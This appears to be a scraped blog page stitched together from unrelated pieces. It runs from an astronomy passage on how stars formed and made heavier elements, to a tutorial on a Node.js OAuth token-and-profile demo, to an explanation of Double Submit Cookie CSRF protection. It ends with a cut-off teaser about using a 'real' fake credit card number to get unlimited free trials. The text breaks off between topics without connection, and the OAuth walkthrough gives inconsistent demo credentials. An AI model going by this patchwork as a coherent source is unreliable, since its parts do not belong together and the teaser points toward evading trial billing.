Gravity—the weakest of the forces but the only one that acts cumulatively across long distances—gradually took control, gathering gas and dust into massive globs that collapsed in on themselves until fusion reactions were ignited and the first stars were born. At much larger scales, gravity pulled together huge regions of denser-than-average gas. These evolved into clusters of galaxies, each one brimming with billions of stars. 

Over the eons fusion reactions inside stars transformed hydrogen and helium into other atomic nuclei, including carbon, the basis for all life on Earth. 

The most massive stars sometimes exploded in energetic supernovas that produced even heavier elements, up to and including iron. Where the heaviest elements, such as uranium and lead, came from still remains something of a mystery. 



Wednesday, May 9, 2018

WebApp RESTful API

I have created an authorization server and resource server both in a single API. There is an endpoint that you can call in order to retrieve the resources for the demonstration purposes.
This is written using node.js. In order to run this on your computer you have to have node.js installed on your computer.

app.js

As you can see oauth grant type I have given is client_credentials. This has to be mentioned in the request body when you try to get the access token from authorization server.
Also this app tuns on port 4000. You can give any port number here.
There are two endpoints I have created in this. One to get the access token which is "/oauth/token" and the other one is to get resources which is "/profile".
As resources I have hard coded one value which is name ("Waas") and this comes as a JSON object.

model.js


Here I have created a sample user. (username = admin, password = admin) and all the functions that handle requests from client are written in this file.

Run the app.js file.


To make all get and post requests to the resource server we use RESTclient Mozilla Firefox Add on. You can use other similar products such as Postman for this.

First of all We have to make a POST request to get the access token from the authorization server.
For that we have to send the authorization key in the header.

Authorization : Bearer XXXXXXXXXXXXXXX
And also we have to mention the content type in the header.

I ll demonstrate with RestClient on Mozilla Firefox with creating all the requests manually and of course how to retrieve resources.


Then we have to mention these 3 parameters in the body.
username=test
password=test
grant_type=client_credentials

The URL should be the endpoint that gives us the access token.

http://localhost:4000/oauth/token 


When we send this we get the response which has access token in it. This access token also have an expiration time.

Then we have to make a GET request to retrieve the resources we need.



Now our URL is different because we have to call a different endpoint to get these resources which is "http://localhost:4000/profile".
We do not have to mention anything in the body.
In the request header we should send the access token we got in the previous step.

Authization: Bearer XXXXXXXXXXXXXXX

Make sure that the access token is not expired. Otherwise you will get an error message saying that it has expired.

When you sent this request you get a response that contains the resources we specified in the code.

Find the Source code from here.

Double Submit Cookies

Cross-site Request Forgery protection in web applications via Double Submit Cookies Patterns.


In the previous blog post I have described about Synchronize Token Pattern Approach which can be applied as a prevention method of Cross Site Request Forgery(CSRF). In this blog post I will share some knowledge on another CSRF prevention technique which is Double Submit Cookie Pattern approach.


According to Wikipedia Double Submit Cookie is defined as sending a random number value in both a cookie and as a request parameter, with the server verifying that the cookie value and request value match. 

Sample Demonstration

As  similar as the previous  blog post i just created a simple login form by hard coding the user credentials.


Upon login, I generated a session identifier and set as a cookie in the browser.At the same time generate the CSRF token for the session and set a cookie in the browser.

After a successful login it will redirect you to another page which consists a form to be filled.

When the form is submitted to the action the CSRF token cookie will be submitted and also in the form body the CSRF token value will be submitted.

In the web page that accepts the form submission (the URL of the action), obtain the CSRF token received in the cookie and also in the message body.Compare the two values received and if they match, show success message. If not show error message.


You can find the source code from here.

Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to ...